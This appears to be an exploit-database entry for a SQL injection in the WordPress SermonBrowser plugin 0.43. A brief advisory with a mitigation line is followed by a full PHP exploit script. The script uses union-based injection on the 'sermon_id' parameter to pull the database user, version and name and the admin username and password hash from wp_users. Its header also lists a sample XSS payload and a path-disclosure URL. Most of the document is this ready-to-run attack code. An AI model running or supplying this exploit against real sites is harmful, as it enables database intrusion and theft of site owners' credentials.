WordPress SermonBrowser Plugin 0.43 SQL Injection

vendor:

WordPress SermonBrowser Plugin

by:

Ma3sTr0-Dz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: WordPress SermonBrowser Plugin

Affected Version From: 0.43

Affected Version To: 0.43

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

WordPress SermonBrowser Plugin 0.43 SQL Injection

The WordPress SermonBrowser Plugin 0.43 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information from the database. This vulnerability is due to the lack of proper sanitization of user-supplied input in the 'sermon_id' parameter of the 'sermon.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information from the database.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the plugin.

Source

Exploit-DB raw data:

<?php

if(!$argv[1])
die("

Usage   : php exploit.php [site]
Example : php exploit.php http://site.com/wp/

");
print_r("

# Tilte......: [ WordPress SermonBrowser Plugin 0.43 SQL Injection ]
# Author.....: [ Ma3sTr0-Dz ]
# Date.......: [ 25-o4-2o11 ]
# Location ..: [ ALGERIA ]
# HoMe ......: [ wWw.sEc4EvEr.CoM ]
# Download ..: [ http://www.4-14.org.uk/wordpress-plugins/sermon-browser ]
# Gr33tz ....: [ All Sec4ever Member'z ]
# Real Bug Founder : Lagripe-Dz

                      -==[ ExPloiT ]==-
					  
# SQL Inj : http://site/wp/?sermon_id=-1+union+select+version(),2--
# XSS     : http://site/wp/?download&file_name=<script>alert(0)</script>
# FPD     : http://site/wp/wp-content/plugins/sermon-browser/sermon.php

                       -==[ Start ]==-

");

$t=array("db_usr"=>"user()","db_ver"=>"version()","db_nam"=>"database()","usr_nm"=>"user_login","passwd"=>"user_pass");

function text2hex($string) {
 $hex = '';
 $len = strlen($string) ;
 for ($i = 0; $i < $len; $i++) {
  $hex .= str_pad(dechex(ord($string[$i])), 2, 0, STR_PAD_LEFT);
 }
 return $hex;
}

foreach($t as $r=>$y){

$x=@file_get_contents($argv[1]."?sermon_id=-1/**/UnIoN/**/SeLeCt/**/group_concat(0x".text2hex("<$r>").",$y,0x".text2hex("<$r>")."),2+from+wp_users+where+ID=1--");

preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);

echo $u = ($dz[1][0]) ? "[-] $r  : ".$dz[1][0]."\n" : "[-] $r  : Failed !\n";

}

print_r("
                      -==[ Finished ]==-
");

# By Lagripe-Dz .. !
# END .. !

?>